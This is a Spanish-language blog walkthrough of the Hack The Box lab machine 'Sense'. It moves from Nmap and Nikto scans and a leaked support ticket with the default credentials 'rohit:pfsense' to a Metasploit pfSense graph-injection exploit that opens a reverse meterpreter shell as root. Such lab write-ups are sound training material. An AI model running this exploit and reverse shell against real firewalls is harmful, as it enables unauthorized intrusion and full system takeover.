Sense hack the box tutorial en Español

by | Mar 27, 2019 | Blog

Como siempre empezamos con el discovery

Primero Sense es un firewall así que podemos asumir que para hayá irán los tiros.

Nmap nos dice que esta abierto el puerto 80 y el 433

Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 11:04 CET                                      
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan                      
SYN Stealth Scan Timing: About 15.94% done; ETC: 11:07 (0:02:17 remaining)                           
Stats: 0:01:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 68.66% done; ETC: 11:06 (0:00:41 remaining)
Nmap scan report for 10.10.10.60
Host is up (0.017s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 223.48 seconds

Sparta nos dice lo mismo pero como siempre nos da mas información.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.60
+ Target Hostname:    10.10.10.60
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
                   Ciphers:  AES256-SHA
                   Issuer:   /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
+ Start Time:         2019-03-27 11:06:06 (GMT1)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie cookie_test created without the secure flag
+ Cookie cookie_test created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.html, /index.php
+ Hostname '10.10.10.60' does not match certificate's names: Common
+ OSVDB-112004: /: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /index.php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3092: /tree/: This might be interesting...
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ /help.php: A help file was found.
+ 7500 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2019-03-27 11:14:51 (GMT1) (525 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Particularmente interesante es shellshock, los dos index y los otros lugares de php. Lanzaremos dirbuster con php y txt para ver que otras cosas descurbrimos. Hay que acordarnos de quitarle lo recursive sino se hará eterno.

Hay dos archivos en dirbuster

  1. changelog.txt
  2. system_users.txt
####Support ticket###

Please create the following user


username: Rohit
password: company defaults

ciertamente hay que adivinar un poco porque el verdadero username es “rohit” pero bueno con “rohit:pfsense”

Metasploit

A partir de aquí es muy sencilo.

msf5 exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_e
xec 
msf5 exploit(unix/http/pfsense_graph_injection_exec) > show options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    10.10.10.60      yes       The target address range or CIDR identifier
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  rohit            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.91      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target




msf5 exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.91:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (38247 bytes) to 10.10.10.60
[*] Meterpreter session 3 opened (10.10.14.91:4444 -> 10.10.10.60:39599) at 2019-03-27 12:46:20 +0100
[!] Tried to delete HgyHu, unknown result

meterpreter > lpwd
/root
meterpreter > ps

Process List
============

 PID  Name  User  Path
 ---  ----  ----  ----
 0                

meterpreter > getuid
Server username: root (0)
meterpreter >

 

Y ya eres root, con eso puedes cat los dos archivos.